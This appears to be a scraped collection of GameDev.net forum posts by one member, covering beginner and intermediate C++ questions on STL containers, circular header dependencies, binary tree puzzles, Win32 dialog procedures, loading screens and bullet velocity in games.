Returns an autoreleased scroll view object.
Returns an autoreleased scroll view object.
Returns the untransformed size of the node.
Reimplemented from CCNode.
direction allowed to scroll.
CCScrollViewDirectionBoth by default..
If isTouchEnabled, this method is called onEnter.
Override it to change the way CCLayer receives touch events. ( Default: CCTouchDispatcher::sharedDispatcher()->addStandardDelegate(this,0); ) Example: void CCLayer::registerWithTouchDispatcher() { CCTouchDispatcher::sharedDispatcher()->addTargetedDelegate(this,INT_MIN+1,true); }
Reimplemented from CCLayer..
Determines whether the scroll view is allowed to bounce or not.
If YES, the view is being dragged.
Determiens whether user touch is moved after begin phase.
max inset point to limit scrolling by touch
max zoom scale
min inset point to limit scrolling by touch
max and min scale
min zoom scale
length between two fingers
current zoom scale
Container holds scroll view contents, Sets the scrollable container object of the scroll view.
scroll view delegate
UITouch objects to detect multitouch.
Content offset.
Note that left-bottom point is the origin
scissor rect for parent, just for restoring GL_SCISSOR_BOX
scroll speed
Touch point. | http://www.cocos2d-x.org/reference/native-cpp/V2.2.1/d3/dbc/classcocos2d_1_1extension_1_1_c_c_scroll_view.html | CC-MAIN-2018-26 | refinedweb | 181 | 52.97 |
A friendly place for programming greenhorns!
Big Moose Saloon
Search
|
Java FAQ
|
Recent Topics
|
Flagged Topics
|
Hot Topics
|
Zero Replies
Register / Login
JavaRanch
»
Java Forums
»
Java
»
Beginning Java
Author
Date format reversing
JeffreyAaron Smith
Greenhorn
Joined: Jan 26, 2013
Posts: 4
posted
Feb 23, 2013 17:27:53
0
I've been working on a pair of programs (driver and driven) that will accept input in the form of numbers a slash mark and numbers, which represent the month and day. The program error checks the input for valid numbers and then prints a line with the numbers as entered (mm/dd) and with the month spelled out (Month dd). Unfortunately, my code is somehow reversing the value for the date (i.e. 02/05=May 2).
I'm sure this is something simple I'm overlooking, but I've been scouring this code all day and can't find it. Any help would be greatly appreciated.
The driver:
import java.util.Scanner; public class SmithJeffreyDateDriver { public static void main(String args[]) { Scanner stdIn = new Scanner(System.in); String error = null; String dateStr = null; boolean repeat = true; while (repeat) { System.out.print("Enter a date in the form mm/dd ('q' to quit): "); dateStr = stdIn.nextLine(); if (dateStr != null) { if (!dateStr.equalsIgnoreCase("q")) { Date d = new Date(dateStr); error = d.getError(); if (error == null) { d.monthDayNumbers(); d.monthLtrsDayNbrs(); System.out.println(""); } else System.out.println(error); } else repeat = false; } else System.out.println("You must enter something."); } } } // End of class SmithJeffreyDateDriver
And the driven class:
public class Date { private int month = -1; private int day = -1; private int[] monthLength = {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}; private String[] monthFull = {"January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"}; private String error = null; private String errorMessage = null; // Date constructor with error checking public Date(String dateStr) { int mth1 = 0; int mth2 = 0; int day1 = 0; int day2 = 0; int dateLength = 0; // Creates error message if dateStr is less than minimum length if (dateStr.length() < 3) errorMessage = "1Invalid date format - " + dateStr; else try { dateLength = dateStr.length(); errorMessage = "2Invalid date format - " + dateStr; int spot = dateStr.indexOf("/"); if (spot < 0) throw new Exception(error); errorMessage = "4Invalid format - " + dateStr; if (spot+2 <= dateLength) mth2 = Integer.valueOf(dateStr.substring(spot+1, spot+2)); else throw new Exception(errorMessage); try { if (spot+3 <= dateLength) { mth1 = Integer.valueOf(dateStr.substring(spot+2, spot+3)); month = mth2 * 10 + mth1; } } finally { if (mth2 < 1) month = mth1; } if ((month < 1) || (month > 12)) throw new Exception(error); errorMessage = "6Invalid month - " + dateStr; if (spot > 0) day2 = Integer.valueOf(dateStr.substring(spot-1, spot)); try { if (spot > 1) { day1 = Integer.valueOf(dateStr.substring(spot-2, spot-1)); day = day1 * 10 + day2; } } finally { if (day1 < 1) day = day2; } if ((day < 1) || (day > 31)) throw new Exception(error); errorMessage = "8Invalid day - " + dateStr; int days = monthLength[month-1]; errorMessage = "9Invalid day - " + dateStr; if (day > days) throw new Exception(error); } catch (Exception e) { error = errorMessage + "\n"+e.getMessage()+"\n"; } } // Print method to print month-day all in numbers public void monthDayNumbers() { System.out.printf("%02d/%02d\n", month, day); } // Print method to print in month-day with month spelled out and numbers public void monthLtrsDayNbrs() { System.out.println(monthFull[month-1]+" "+String.valueOf(day)); } // getError method that returns error value after all error checking is done public String getError() { return error; } } // End of class Date
Bear Bibeault
Author and ninkuma
Marshal
Joined: Jan 10, 2002
Posts: 63529
72
I like...
posted
Feb 23, 2013 18:20:54
0
First of all, it's not the best idea to name your own classes the same as
Java
classes. Leave "Date" alone.
And, why are you writing all this code when the
DateFormat
and Calendar classes already have it all solved for you?
[
Asking smart questions
] [
About Bear
] [
Books by Bear
]
JeffreyAaron Smith
Greenhorn
Joined: Jan 26, 2013
Posts: 4
posted
Feb 23, 2013 19:00:24
0
Because this is a project for a class with very specific requirements. For instance the driven class portion of the program must be named, "Date.java" and the driver named "LastnameFirstnameDateDriver.java". It also must include a Date constructor that receives a
string
called dateStr. It must error check the input using try/catch.
Unfortunately now I've been error checking, rewriting, adding, deleting for so long now, I'm not sure where I'm at...looking over the code, I suspect I have complicated it more than it needs to be.
I'm sorry to be asking, but can you help look through my code and streamline/debug?
Rene Larsen
Ranch Hand
Joined: Oct 12, 2001
Posts: 1179
I like...
posted
Feb 25, 2013 04:15:50
0
You expect the input format to be mm/dd - but this is not what you expect in your Date code.
You start with finding the date delimiter '/', then you try to find the month, but is is the day you select (spot + 2) - and then you try to find the day, but also here you select the wrong one, you select the month (spot -1)
Regards, Rene Larsen
Dropbox Invite
I agree. Here's the link:
subject: Date format reversing
Similar Threads
help with Progamme
Custom Date class and Appointment class
BigDecimal to Date Conversion
Subtract 2 Dates
cannot find symbol inside String?
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/605693/java/java/Date-format-reversing | CC-MAIN-2015-40 | refinedweb | 905 | 61.16 |
Python in the context of CMotion
On 25/08/2018 at 07:45, xxxxxxxx wrote:
I'm digging around some areas of c4d which I've neglected for a while, today its the CMotion object.
Does anyone know of any examples or use cases for python in the context of CMotion actions? Does it have some predefined parameters/variables? in the help file it just says
"You can write, copy, paste, etc.. your Python scripts in this input field. They will be executed automatically by CMotion once the animation is run."
So I assume there must be some method of addressing relevant / relative cmotion properties?
On 27/08/2018 at 09:01, xxxxxxxx wrote:
Hi Nnenov,
Regarding your question, you have to define a function called Action.
Then there is some globals variable available.
doc: BaseDocument - The document of the current Cmotion Object.
op: BaseList2D - The object affected by this python Cmotion action.
time: float - The time in the current document.
cycle: float - Count of cycle already occurs (for example if the Cmotion Time is set to 30F, it's basically int(CurrentFrame)/int(30))
pos: float - Current time position in the cycle (from 0.0 to 1.0)
phase: float - Current value of the phase.
weight: float - The weight of the python Cmotion action.
Here a basic example about how to move an object in the X direction.
import c4d def Action() : maxXValue = 100 * weight op.SetRelPos(c4d.Vector(maxXValue,0 ,0) * pos)
If you have any question please let me know!
Cheers,
Maxime.
On 27/08/2018 at 19:44, xxxxxxxx wrote:
Hi Maxime,
Thanks, this is great!
I was wondering, is there a way to get other objects in the list, for example if op is the object affected by the action, is there a way to relatively (or absolutely) reference another object in the CMotion object manager?
e.g. I tried op.GetNext() but it doesn't seem to work
Thanks again!
Nick
On 28/08/2018 at 03:22, xxxxxxxx wrote:
Hi,
I'm afraid it's not possible, op is just a link to the actual object within the scene.
And there is no way to find the corresponding Cmotion Object, and even if you get the Cmotion Object, CMotion[c4d.ID_CA_WCYCLE_TAG_OBJECTS] is currently not exposed in python and you can't iterate the tree.
Cheers,
Maxime.
On 28/08/2018 at 19:42, xxxxxxxx wrote:
Aw well, I'm not sure what I want to do yet anyway. If I wanted I can just reference the parameters being affected directly from the objects in my scene, I think. need to play with it more
Thanks! | https://plugincafe.maxon.net/topic/10930/14387_python-in-the-context-of-cmotion | CC-MAIN-2020-05 | refinedweb | 442 | 74.29 |
Subject: Re: [boost] Boost.Process article: Tutorial and request for comments
From: vicente.botet (vicente.botet_at_[hidden])
Date: 2009-04-21 17:21:14
Hi,
Excellent idea to write this article.
I have not used the library neither read the documentation deply.
I have however some suggestion about the library design.
I don't see the need to separate between several specific platform classes.
A program using the Proces library will run only with one platform available, so classes as process and child could include conditionaly the specific features. The current design has the advantage of making explicit the non portable parts, but how do you provide features common to two platforms that are not available to a third one? In addition the risk to make specific classes would be that the underlying concepts are too close to the concrete feautures provided by one platform. I would prefer to have a specific define for each non portable feature.
I will organize the specific classes on a specific platform namespace
common for the portable part
namespace process {
namespace common {
class process;
class child;
}
posix for the posix based OS
#ifdef BOOST_PLATFORM_POSIX // or something like
namespace process {
namespace posix {
class process : public common::process{...};
class child: public common::child{...};
}
}
#endif
window for the micosoft OS based platforms
#ifdef BOOST_PLATFORM_WINDOWS // or something like
namespace process {
namespace windows {
class process : public common::process{...};
class child: public common::child{...};
}
}
#endif
// other platforms
and have typedef or a using directive at the namespace process level for each one of the available classes as
namespace process {
#if defined(__POSIX__) // or something like
typedef posix::process process;
// or using posix::process;
#elsif defined() // other patforms
...
#else
typedef common::process process;
or // using common::process;
#endif
}
When the user use a non portable feature on a portable programm it will need to check conditionally for the non portable feature as
#ifdef BOOST_PROCESS_HAS_SPECIFC_FEATURE_1
// ...
#else
// ...
#endif
Your proposal about iterating over all the process working on a machine is a must to have.
The issue respect to the map environement could be abstracted by defining a specific class that manage the synchronization between the settings and the collection.
Even if the following could be done in a higher library (Shell), I would like to think about the context concept as a shell which can be nested and have a stack of shells. This stack can be stored on a thread specific context, so when a new process is created it will inherit from the current context.
In the shell context a command could find a place. For example,
shell::cd("/tmp");
will change the current directory to "/tmp" on the top context of the stack..
If the command fails it can be recovered
Commands could be composed using pipe "|",
shell::cat("/tmp.file.txt") | shell::wc();
redirection ">"
shell::cat("/tmp.file.txt") | shell::wc() > str;
tee
shell::cat("/tmp.file.txt") | shell::grep () | shell::tee("file");
conditional concatenation "&",
shell::cd("/tmp") & shell::ls();
which executes ls only if cd /tmp succeeds.
Portability is not only related to the platform features, but also about the features provided by specific programs. I would like to see an example of how the user would write portable code when he wants to execute a program that has different syntax on different platforms but provides the same feature, e.g the equivalent of "ping" on solaris id "ping -c 1" on linux.
Last some minor questions:
What about renaming handle by native_handle?
What is wrong on using the Boost.Filesystem library to idientify executables?
Why the do we need to duplicate the name of the executables as an argument?
Respect to relative or absolute path of executables,why not let the undelying platform to handle with this?
HTH,
Vicente
----- Original Message -----
From: "Boris Schaeling" <boris_at_[hidden]>
To: <boost_at_[hidden]>
Cc: <boost-users_at_[hidden]>
Sent: Tuesday, April 21, 2009 2:01 PM
Subject: [boost] Boost.Process article: Tutorial and request for comments
>
>
>
> _______________________________________________
> Unsubscribe & other changes:
>
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk | https://lists.boost.org/Archives/boost/2009/04/151001.php | CC-MAIN-2019-51 | refinedweb | 681 | 55.13 |
Ruby Array Exercises: Check whether a given array contains a 3 next to a 3 or a 5 next to a 5, but not both
Ruby Array: Exercise-38 with Solution
Write a Ruby program to check whether a given array contains a 3 next to a 3 or a 5 next to a 5, but not both.
Ruby Code:
def check_array(nums) no3pair = 1 no5pair = 1 i = 0; while i < nums.length && (no3pair + no5pair != 0) if(nums[i] == 3 && nums[i+1] == 3) no3pair = 0 elsif(nums[i] == 5 && nums[i+1] == 5) no5pair = 0 end i = i + 1 end return ((no3pair ^ no5pair) == 1) end print check_array([3, 3, 7, 5]),"\n" print check_array([3, 8, 5, 9]),"\n" print check_array([3, 7, 5, 5]),"\n"
Output:
true false true
Flowchart:
Ruby Code Editor:
Contribute your code and comments through Disqus.
Previous: Write a Ruby program to check whether a given value appears everywhere in an given array. A value is "everywhere" in an array if it presents for every pair of adjacent elements in the array.
Next: Write a Ruby program to check whether a given array of integers contains two 6's next to each other, or there are two 6's separated by one element, such as {6, 2, | https://www.w3resource.com/ruby-exercises/array/ruby-array-exercise-38.php | CC-MAIN-2021-21 | refinedweb | 213 | 60.28 |
yamlesqueyamlesque
Pure Scala YAML parsing.
As the name suggests, "yaml-esque" is a Scala implementation of the most frequently used YAML features. It takes inspiration from Li Haoyi's ujson library and aims to provide an idiomatic API that is cross-platform and has no dependencies.
Getting StartedGetting Started
Include yamlesque into a project.
mill:
ivy"io.crashbox::yamlesque::<latest_tag>"
sbt:
"io.crashbox" %%% "yamlesque" % "<latest_tag>"
Yamlesque is available for Scala 3 and 2.13, including ScalaJS and Native.
It should also work with Scala 2.12, 2.11, 2.10 and 2.9, although no pre-compiled libraries are published for these versions.
👉 Online Converter 👈
Built with ScalaJS, this online converter allows you to transform YAML to JSON as you type.
Read Some YAMLRead Some YAML
val text = s"""|name: yamlesque |description: a YAML library for scala |authors: | - name: Jakob Odersky | id: jodersky |""".stripMargin val yaml: yamlesque.Value = yamlesque.read(text) val id = yaml.obj("authors").arr(0).obj("id").str println(id) // == "jodersky"
Write Some YAMLWrite Some YAML
import yamlesque as y val config = y.Obj( "auth" -> y.Obj( "username" -> y.Str("admin"), "password" -> y.Str("guest") ), "interfaces" -> y.Arr( y.Obj( "address" -> y.Str("0.0.0.0"), "port" -> y.Str("80") ), y.Obj( "address" -> y.Str("0.0.0.0"), "port" -> y.Str("443") ) ) ) val stringly = config.render() println(stringly)
will result in
auth: username: admin password: guest interfaces: - address: 0.0.0.0 port: 80 - address: 0.0.0.0 port: 443
Official YAML ConformanceOfficial YAML Conformance
Yamlesque does not strictly implement all features as defined in YAML 1.2, however support should be sufficient for most regular documents.
A major point of divergence between official YAML and this library is the way in which typing of strings is done. Whereas official YAML implicitly casts strings to narrower types when possible (for example the string "2" is treated as the number 2), this library always treats strings as text. This approach leads to a more uniform parsing system which avoids many subtle bugs, including the infamous Norway Problem. In your application of course, you are still free to attempt to read strings as diffferent types. Just the parser won't do this for you.
Available features:
- strings: plain (i.e. scalars) and double quoted
- block-style strings (| and >)
- lists and maps
Features which are currently not supported but for which support is planned:
- multiple documents (i.e. ---)
- single quoted strings
Unsupported features with no planned implementation:
- anchors and references
- flow-styles (aka inline JSON)
- chomping modifiers (e.g. the '-' in '>-')
Pull requests with additional feature implementations are always welcome!
Geny-CompatibleGeny-Compatible
The core type
yamlesque.Value is a
geny.Writable. This means that it will
work "out-of-the-box" with many other libraries from the "Singaporean
Stack". Some examples:
Read YAML from a file, using the os-lib library:
yamlesque.read(os.read.stream(os.pwd / "config.yaml"))
Send it as part of a HTTP request, using the scala-requests library:
val yaml: yamlesque.Value = ... requests.post( "https://....", body = yaml )
Send it as part of a HTTP response, using the cask framework. | https://index-dev.scala-lang.org/jodersky/yamlesque | CC-MAIN-2022-40 | refinedweb | 518 | 61.22 |
This document is focused on using
data.table as a dependency in other R packages. If you are interested in using
data.table C code from a non-R application, or in calling its C functions directly, jump to the last section of this vignette.
Importing
data.table is no different from importing other R packages. This vignette is meant to answer the most common questions arising around that subject; the lessons presented here can be applied to other R packages.
data.table
One of the biggest features of
data.table is its concise syntax which makes exploratory analysis faster and easier to write and perceive; this convenience can drive packages authors to use
data.table in their own packages. Another maybe even more important reason is high performance. When outsourcing heavy computing tasks from your package to
data.table, you usually get top performance without needing to re-invent any high of these numerical optimization tricks on your own.
data.tableis easy
It is very easy to use
data.table as a dependency due to the fact that
data.table does not have any of its own dependencies. This statement is valid for both operating system dependencies and R dependencies. It means that if you have R installed on your machine, it already has everything needed to install
data.table. This also means that adding
data.table as a dependency of your package will not result in a chain of other recursive dependencies to install, making it very convenient for offline installation.
DESCRIPTIONfile {DESCRIPTION}
The first place to define a dependency in a package is the
DESCRIPTION file. Most commonly, you will need to add
data.table under the
Imports: field. Doing so will necessitate an installation of
data.table before your package can compile/install. As mentioned above, no other packages will be installed because
data.table does not have any dependencies of its own. You can also specify the minimal required version of a dependency; for example, if your package is using the
fwrite function, which was introduced in
data.table in version 1.9.8, you should incorporate this as
Imports: data.table (>= 1.9.8). This way you can ensure that the version of
data.table installed is 1.9.8 or later before your users will be able to install your package. Besides the
Imports: field, you can also use
Depends: data.table but we strongly discourage this approach (and may disallow it in future) because this loads
data.table into your user’s workspace; i.e. it enables
data.table functionality in your user’s scripts without them requesting that.
Imports: is the proper way to use
data.table within your package without inflicting
data.table on your user. In fact, we hope the
Depends: field is eventually deprecated in R since this is true for all packages.
NAMESPACEfile {NAMESPACE}
The next thing is to define what content of
data.table your package is using. This needs to be done in the
NAMESPACE file. Most commonly, package authors will want to use
import(data.table) which will import all exported (i.e., listed in
data.table’s own
NAMESPACE file) functions from
data.table.
You may also want to use just a subset of
data.table functions; for example, some packages may simply make use of
data.table’s high-performance CSV reader and writer, for which you can add
importFrom(data.table, fread, fwrite) in your
NAMESPACE file. It is also possible to import all functions from a package excluding particular ones using
import(data.table, except=c(fread, fwrite)).
Be sure to read also the note about non-standard evaluation in
data.table in the section on “undefined globals”
As an example we will define two functions in
a.pkg package that uses
data.table. One function,
gen, will generate a simple
data.table; another,
aggr, will do a simple aggregation of it.
Be sure to include tests in your package. Before each major release of
data.table, we check reverse dependencies. This means that if any changes in
data.table would break your code, we will be able to spot breaking changes and inform you before releasing the new version. This of course assumes you will publish your package to CRAN or Bioconductor. The most basic test can be a plaintext R script in your package directory
tests/test.R:
When testing your package, you may want to use
R CMD check --no-stop-on-test-error, which will continue after an error and run all your tests (as opposed to stopping on the first line of script that failed) NB this requires R 3.4.0 or greater.
testthat
It is very common to use the
testthat package for purpose of tests. Testing a package that imports
data.table is no different from testing other packages. An example test script
tests/testthat/test-pkg.R:
context("pkg tests") test_that("generate dt", { expect_true(nrow(gen()) == 100) }) test_that("aggregate dt", { expect_true(nrow(aggr(gen())) < 100) })
If
data.table is in Suggests (but not Imports) then you need to declare
.datatable.aware=TRUE in one of the R/* files to avoid “object not found” errors when testing via
testthat::test_package or
testthat::test_check.
data.table’s use of R’s deferred evaluation (especially on the left-hand side of
R CMD check. This results in
NOTEs like the following during package check:
:=) is not well-recognised by
* checking R code for possible problems ... NOTE aggr: no visible binding for global variable 'grp' gen: no visible binding for global variable 'grp' gen: no visible binding for global variable 'id' Undefined global functions or variables: grp id
The easiest way to deal with this is to pre-define those variables within your package and set them to
NULL, optionally adding a comment (as is done in the refined version of
gen below). When possible, you could also use a character vector instead of symbols (as in
aggr below):
gen = function (n = 100L) { id = grp = NULL # due to NSE notes in R CMD check dt = as.data.table(list(id = seq_len(n))) dt[, grp := ((id - 1) %% 26) + 1 ][, grp := letters[grp] ][] } aggr = function (x) { stopifnot( is.data.table(x), "grp" %in% names(x) ) x[, .N, by = "grp"] }
The case for
data.table’s special symbols (
.SD,
.BY,
.N,
.I,
.GRP,
.NGRP, and
.EACHI; see
?.N) and assignment operator (
data.table’s namespace to protect against any issues arising from the unlikely scenario that we change the exported value of these in the future, e.g. if you want to use
.N,
.I, and
NAMESPACE would have:
:=) is slightly different. You should import whichever of these values you use from
:=, a minimal
Much simpler is to just use
import(data.table) which will greedily allow usage in your package’s code of any object exported from
data.table.
If you don’t mind having
id and
grp registered as variables globally in your package namespace you can use
?globalVariables. Be aware that these notes do not have any impact on the code or its functionality; if you are not going to publish your package, you may simply choose to ignore them.
Common practice by R packages is to provide customization options set by
options(name=val) and fetched using
getOption("name", default). Function arguments often specify a call to
getOption() so that the user knows (from
?fun or
args(fun)) the name of the option controlling the default for that parameter; e.g.
fun(..., verbose=getOption("datatable.verbose", FALSE)). All
data.table options start with
datatable. so as to not conflict with options in other packages. A user simply calls
options(datatable.verbose=TRUE) to turn on verbosity. This affects all calls to
fun() other the ones which have been provided
verbose= explicity; e.g.
fun(..., verbose=FALSE).
The option mechanism in R is global. Meaning that if a user sets a
data.table option for their own use, that setting also affects code inside any package that is using
data.table too. For an option like
datatable.verbose, this is exactly the desired behavior since the desire is to trace and log all
data.table operations from wherever they originate; turning on verbosity does not affect the results. Another unique-to-R and excellent-for-production option is R’s
options(warn=2) which turns all warnings into errors. Again, the desire is to affect any warning in any package so as to not miss any warnings in production. There are 6
datatable.print.* options and 3 optimization options which do not affect the result of operations. However, there is one
data.table option that does and is now a concern:
datatable.nomatch. This option changes the default join from outer to inner. [Aside, the default join is outer because outer is safer; it doesn’t drop missing data silently; moreover it is consistent to base R way of matching by names and indices.] Some users prefer inner join to be the default and we provided this option for them. However, a user setting this option can unintentionally change the behavior of joins inside packages that use
data.table. Accordingly, in v1.12.4 (Oct 2019) a message was printed when the
datatable.nomatch option was used, and from v1.14.2 it is now ignored with warning. It was the only
data.table option with this concern.
If you face any problems in creating a package that uses data.table, please confirm that the problem is reproducible in a clean R session using the R console:
R CMD check package.name.
Some of the most common issues developers are facing are usually related to helper tools that are meant to automate some package development tasks, for example, using
roxygen to generate your
NAMESPACE file from metadata in the R code files. Others are related to helpers that build and check the package. Unfortunately, these helpers sometimes have unintended/hidden side effects which can obscure the source of your troubles. As such, be sure to double check using R console (run R on the command line) and ensure the import is defined in the
DESCRIPTION and
NAMESPACE files following the instructions above.
If you are not able to reproduce problems you have using the plain R console build and check, you may try to get some support based on past issues we’ve encountered with
data.table interacting with helper tools: devtools#192 or devtools#1472.
Since version 1.10.5
data.table is licensed as Mozilla Public License (MPL). The reasons for the change from GPL should be read in full here and you can read more about MPL on Wikipedia here and here.
data.table: Suggests
If you want to use
data.table conditionally, i.e., only when it is installed, you should use
Suggests: data.table in your
DESCRIPTION file instead of using
Imports: data.table. By default this definition will not force installation of
data.table when installing your package. This also requires you to conditionally use
data.table in your package code which should be done using the
?requireNamespace function. The below example demonstrates conditional use of
data.table’s fast CSV writer
?fwrite. If the
data.table package is not installed, the much-slower base R
?write.table function is used instead.
my.write = function (x) { if(requireNamespace("data.table", quietly=TRUE)) { data.table::fwrite(x, "data.csv") } else { write.table(x, "data.csv") } }
A slightly more extended version of this would also ensure that the installed version of
data.table is recent enough to have the
fwrite function available:
my.write = function (x) { if(requireNamespace("data.table", quietly=TRUE) && utils::packageVersion("data.table") >= "1.9.8") { data.table::fwrite(x, "data.csv") } else { write.table(x, "data.csv") } }
When using a package as a suggested dependency, you should not
import it in the
NAMESPACE file. Just mention it in the
DESCRIPTION file. When using
data.table functions in package code (R/* files) you need to use the
data.table:: prefix because none of them are imported. When using
data.table in package tests (e.g. tests/testthat/test* files), you need to declare
.datatable.aware=TRUE in one of the R/* files.
data.tablein
Importsbut nothing imported
Some users (e.g.) may prefer to eschew using
importFrom or
import in their
NAMESPACE file and instead use
data.table:: qualification on all internal code (of course keeping
data.table under their
Imports: in
DESCRIPTION).
In this case, the un-exported function
[.data.table will revert to calling
[.data.frame as a safeguard since
data.table has no way of knowing that the parent package is aware it’s attempting to make calls against the syntax of
data.table’s query API (which could lead to unexpected behavior as the structure of calls to
[.data.frame and
[.data.table fundamentally differ, e.g. the latter has many more arguments).
If this is anyway your preferred approach to package development, please define
.datatable.aware = TRUE anywhere in your R source code (no need to export). This tells
data.table that you as a package developer have designed your code to intentionally rely on
data.table functionality even though it may not be obvious from inspecting your
NAMESPACE file.
data.table determines on the fly whether the calling function is aware it’s tapping into
data.table with the internal
cedta function (Calling Environment is Data Table Aware), which, beyond checking the
?getNamespaceImports for your package, also checks the existence of this variable (among other things).
For more canonical documentation of defining packages dependency check the official manual: Writing R Extensions.
Some of internally used C routines are now exported on C level thus can be used in R packages directly from their C code. See
?cdt for details and Writing R Extensions Linking to native routines in other packages section for usage.
Some tiny parts of
data.table C code were isolated from the R C API and can now be used from non-R applications by linking to .so / .dll files. More concrete details about this will be provided later; for now you can study the C code that was isolated from the R C API in src/fread.c and src/fwrite.c. | https://rdatatable.gitlab.io/data.table/library/data.table/doc/datatable-importing.html | CC-MAIN-2022-21 | refinedweb | 2,374 | 59.9 |
49863/snake-head-placed-on-the-center-python-using-turtle
You can et the snakehead color by ...READ MORE
You could simply use a wrapper object ...READ MORE
Hi @Jinu, you could do something like ...READ MORE
Try this:
import turtle
#set up the screen
wn = ...READ MORE
if you google it you can find. ...READ MORE
Syntax :
list. count(value)
Code:
colors = ['red', 'green', ...READ MORE
can you give an example using a ...READ MORE
You can simply the built-in function in ...READ MORE
Hey @Nagya, so you added the following ...READ MORE
You can use something like this:
wn.onkey(move_up, 'Up')
wn.onkey(move_left, ...READ MORE
OR
Already have an account? Sign in. | https://www.edureka.co/community/49863/snake-head-placed-on-the-center-python-using-turtle | CC-MAIN-2019-47 | refinedweb | 117 | 80.48 |
Yeah, but main problem is that internet is powerfull source of knowledge. I can find almost everything that i want and i need, sure. But how beginner can separate garbage from diamond? One website for example say to always useusing namespace std;
instead ofusing std::cout; using std::cin;that i prefer. Which one is correct?
I know that i can learn from web, but i dont want to losse my time for future re-learning things that was not correct.
The ones that use the using directive (e.g., "using namespace std;") instead of using declaration (e.g., "using std::cout;") might come from a legacy codebase (ported from C, pre-standard C++ before 1998, etc.). Generally, this is not a good practice due to namespace pollution. See: | http://www.gamedev.net/index.php?app=forums&module=extras§ion=postHistory&pid=4959365 | CC-MAIN-2014-10 | refinedweb | 129 | 67.65 |
The 'bean' keyword acts like the 'enum' keyword. It causes the generated class to implement a JDK interface - Bean.Since bean and property would be contextual keywords, they could be incorporated without fear of breaking existing code. The compiler, upon finding ‘bean’, would construct a new class where the properties would be publicly accessible. These new keywords are based on the Java Bean 1.0 specification. Stephen goes on in his blog to suggest a better syntax that would break (or require and update) to this specification. He suggests that maybe it would be better if the generated code looked like;
public class Person implements Bean { // public final properties public final Property forename = ... public final Property surname = ...To access a property one would have to use something like aPerson.forname.get();. In the conclusion to this blog entry, Stephan remarks that this type of change is unlikely. However, the blog entry does bring up an interesting question, can we effectively change property support in Java without touching the Java Bean specification? | http://www.theserverside.com/discussions/thread.tss?thread_id=43845 | CC-MAIN-2015-11 | refinedweb | 171 | 56.05 |
- Advertisement
xegothMember
Content Count242
Joined
Last visited
Community Reputation154 Neutral
About xegoth
- RankMember
Ugh, haven't programmed in C++ in forever, simple vector question.
xegoth replied to xegoth's topic in For Beginners's ForumQuote:Original post by Will F When you insert something into a standard library container, the object is not put into it. Instead a copy of the object is made. Ah, okay. I didn't realize STL makes a copy, the fact that it was passed by reference is what sent me down that path. Thanks.
Ugh, haven't programmed in C++ in forever, simple vector question.
xegoth posted a topic in For Beginners's ForumI've been coding in C# for the last year or so and recently returned to C++ only to find I seem to have forgotten everything. Heh. Anyhow... given the following scenario... class foo { list<std::string> m_list; foo(int Count) { for(int i = 0; i < NumSeats; i++) { string bar = "something"; m_list.push_back(bar); } } }; Okay. What happens to the data in the list? I want to think that the string is in the scope of the for loop, so it goes out of scope each time around, meaning the list is empty. What *really* happens?
Bullet/Ship Conundrum
xegoth replied to kylecrass's topic in Math and PhysicsMy guess is your ship is going faster than 2km/s and your bullets always fire at 2km/s. Remember, if a bullet is being fired out of a moving ship its initial velocity is: shipVelocity + InitialBulletVelocity. This is because the bullet is ALREADY moving inside of the ship at the speed of the ship, before it's fired. Whatever the muzzle velocity is, needs to be added to the ships velocity.
What operating system do they use at work?
xegoth replied to Klohunt's topic in For Beginners's ForumVisual studio .net for development.. Windows OS. Then again, I work at Microsoft. :P
Binary tree puzzle. Is there an elegant solution?
xegoth replied to xegoth's topic in General and Gameplay ProgrammingThe node to the right is the node on the same level (depth), but to the right. 1 is connected to 4 is connected to 6. 3 is connected to 9.
Binary tree puzzle. Is there an elegant solution?
xegoth posted a topic in General and Gameplay ProgrammingHere's the problem: Create a function that takes a binary tree and connects each node to the node closest to its right. There has to be a really elegant solution for this using recursion... but it hasn't occured to me yet. Anyone?
Simple OO question.
xegoth replied to xegoth's topic in For Beginners's Forumdbzprogrammer, yeah that's the answer. I just couldn't rememember. Thanks :)
Simple OO question.
xegoth posted a topic in For Beginners's ForumMy C++ is unfrotunately a bit rusty and I've run into a problem I don't remember how to get around. If you have the following layout: //A.h #ifndef _A_H_ #define _A_H_ #include "B.h" class A { A() { b = new B(this); } B b; } #endif //B.h #ifndef _B_H_ #define _B_H_ #include "A.h" class B { B(A &a); } #endif The above code wouldn't compile because the line: B(A &a); A hasn't been defined yet. How do you get around a problem like this when you want a class to pass a reference of itself to a child?
WM_PAINT is sent to parent if its child redrawn?
xegoth replied to cpp forever's topic in General and Gameplay ProgrammingIt looks to me like under normal circumstances the child window gets redrawn when the parent window gets redrawn. This makes some sense as it would be undesirable to redraw the child window only and not the parent.
OO Dialog headache.
xegoth posted a topic in General and Gameplay ProgrammingI'm trying to create a class to represent a Win32 dialog in my app. The problem is, the dialog must have a proc which can't be a member of a class. Here's how I implimented it: // Global CConfigMenu *g_ConfigMenu = NULL; // A callback director for the graphics settings dialog's message handler. BOOL CALLBACK ConfigDlgProcDirector( HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam ) { return g_ConfigMenu->ConfigDlgProc( hDlg, message, wParam, lParam ); } CConfigMenu::CConfigMenu() : m_pEnumeration( NULL ) { g_ConfigMenu = this; } This is all good and fine unless there is more than one instance of the class. Does anyone know of an elegant way to roll a win32 dialog up into a class? My current way of doing it seems hackish.
Off center fullscreen
xegoth replied to Antrim's topic in Graphics and GPU ProgrammingI've seen the same issue and fixed it by switching my game to a higher resolution. I don't know what caused it, for me I wanted to run at a higher resolution anyhow so it didn't matter. You might want to try different resolutions as a temproary solution. (Someone else here may know exactly what causes that).
Best way to impliment a loading screen?
xegoth replied to xegoth's topic in Graphics and GPU ProgrammingWhat about just a fixed image without a loading bar. Do I need to continually redraw it or is once sufficient?
Best way to impliment a loading screen?
